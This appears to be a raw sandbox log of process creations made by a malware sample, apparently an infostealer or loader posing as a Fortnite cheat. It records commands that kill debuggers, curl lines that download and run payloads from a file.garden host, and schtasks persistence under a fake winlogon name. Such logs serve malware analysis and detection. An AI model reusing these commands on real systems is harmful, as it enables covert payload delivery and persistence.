Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker" /IM /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg" /IM /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x64dbg" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x32dbg" /IM /F /T
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg" /IM /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg" /IM /F /T
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler" /IM /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler" /IM /F /T
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler" /IM /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler" /IM /F /T
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles" /IM /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles" /IM /F /T
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida" /IM /F /T >nul 2>&1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ida" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker" /IM /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdk
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop KProcessHacker3
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop KProcessHacker2
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop KProcessHacker1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wireshark
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker" /IM /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c color 7	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\Speech\imxyvi.exe "C:\Windows\Speech\imxyvi.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/build.bin --output C:\Windows\Speech\rtcore64.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\Speech\rtcore64.exe "C:\Windows\Speech\rtcore64.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida" /IM /F /T >nul 2>&1	Jump to behavior
